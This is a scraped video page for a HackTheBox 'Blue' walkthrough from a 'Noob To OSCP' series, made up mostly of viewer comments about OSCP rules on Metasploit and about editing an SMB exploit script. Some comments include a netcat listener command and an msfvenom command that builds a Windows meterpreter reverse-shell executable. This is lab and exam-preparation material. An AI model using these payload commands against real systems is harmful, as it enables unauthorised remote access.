HackTheBox - Blue | Noob To OSCP Episode #9

  Рет қаралды 6,625

I.T Security Labs

I.T Security Labs

Күн бұрын

Пікірлер: 24
@tallst1
@tallst1 4 жыл бұрын
I thought this was a walkthrough without using Metasploit?
@ithinkv
@ithinkv 5 жыл бұрын
Also, you mentioned you wouldn't use Metasploit, but meterpreter through metasploit is still banned in OSCP I believe?
@riverfallon6784
@riverfallon6784 4 жыл бұрын
no. You may use meterpreter and metasploit on one machine
@e1Pr0f3ss0r
@e1Pr0f3ss0r 4 жыл бұрын
Why u hvnt used netcat for reverse shell... instead of using windows/meterpreter/reverse..........?
@cabrex5864
@cabrex5864 4 жыл бұрын
OSCP bans the usage of a meterpreter session, you could just use a listener using the command "nc -nlvp 4444" which would give you shell access right? its also permitted by OSCP also msfvenom is not banned by OSCP am I right?
@tallst1
@tallst1 4 жыл бұрын
CABREX msfvenom is allowed
@tallst1
@tallst1 4 жыл бұрын
@D Barbarian meterpreter is not allowed but you can use the multi/handler just for listening.
@AllenGaming.
@AllenGaming. 4 жыл бұрын
how do you go back and forth from the search you did with /smb_send and editing the file? and how do exit and save the file
@commonemail566
@commonemail566 5 жыл бұрын
how did you know that you need to use "ntsvcs" at the end ???
@demiscuzz6427
@demiscuzz6427 4 жыл бұрын
I would like to know aswell?? any idea?
@ithinkv
@ithinkv 5 жыл бұрын
Why did you add // to the username?
@reuben3648
@reuben3648 3 жыл бұрын
Do you have the answer?
@dylbert140485
@dylbert140485 3 жыл бұрын
@@reuben3648 SMB anonymous login
@Saw-o3h
@Saw-o3h 4 жыл бұрын
You mentioned it would be without metasploit 😑
@yourlama57
@yourlama57 2 жыл бұрын
“In the script, you need to put 2 slashes as the username because that’s what I put”
@YA-hx5dz
@YA-hx5dz 3 жыл бұрын
Sir, i could follow your steps, but how can i know how to edit files such as zzz_exploit.py I am just beginner, and my mind is going to explode
@Mustangyeo
@Mustangyeo 2 жыл бұрын
Your explanations are clear. Thank you
@erdinczorlu5398
@erdinczorlu5398 4 жыл бұрын
what is password
@crispusattucks6094
@crispusattucks6094 4 жыл бұрын
I think I remember doing this box with a pre-compiled exploit. Didn't have to fuss with changing much.
@bibeksapkota511
@bibeksapkota511 4 жыл бұрын
Dont use the word OSCP if you are using Meterpreter Waste of time
@ITSecurityLabs
@ITSecurityLabs 4 жыл бұрын
Relax dude. Of all 33 videos in this series this is the one with metasploit. Besides , it is allowed on one box during the OSCP
@YA-hx5dz
@YA-hx5dz 3 жыл бұрын
msfvenom worked for me only with: msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=4444 -f exe > meterpreter.exe
HackTheBox - Chatterbox | Noob To OSCP Episode #19
26:57
I.T Security Labs
Рет қаралды 4,3 М.
HackTheBox - Granny | Noob To OSCP Episode #10
26:44
I.T Security Labs
Рет қаралды 4,8 М.
Don’t Choose The Wrong Box 😱
00:41
Topper Guild
Рет қаралды 62 МЛН
Support each other🤝
00:31
ISSEI / いっせい
Рет қаралды 81 МЛН
Cheerleader Transformation That Left Everyone Speechless! #shorts
00:27
Fabiosa Best Lifehacks
Рет қаралды 16 МЛН
HackTheBox - Arctic | Noob To OSCP Episode #17
33:05
I.T Security Labs
Рет қаралды 4 М.
HackTheBox - Remote
47:52
IppSec
Рет қаралды 42 М.
Zabbix vs Grafana: Which Is Better?
10:44
Antonio Persiano
Рет қаралды 2,6 М.
HackTheBox - Devel | Noob To OSCP Episode #7
21:57
I.T Security Labs
Рет қаралды 4,7 М.
Basic Buffer Overflow - VulnServer TRUN
1:03:04
John Hammond
Рет қаралды 197 М.
TryHackMe! Basic Penetration Testing
30:14
John Hammond
Рет қаралды 2,4 МЛН
Pentesting for n00bs: Episode 7 - Optimum (hackthebox)
29:34
The Cyber Mentor
Рет қаралды 22 М.
HackTheBox - BankRobber
1:10:14
IppSec
Рет қаралды 60 М.
HackTheBox - Grandpa | Noob To OSCP Episode #11
12:59
I.T Security Labs
Рет қаралды 5 М.
HackTheBox - Bashed | Noob To OSCP Episode #3
20:27
I.T Security Labs
Рет қаралды 4 М.
Don’t Choose The Wrong Box 😱
00:41
Topper Guild
Рет қаралды 62 МЛН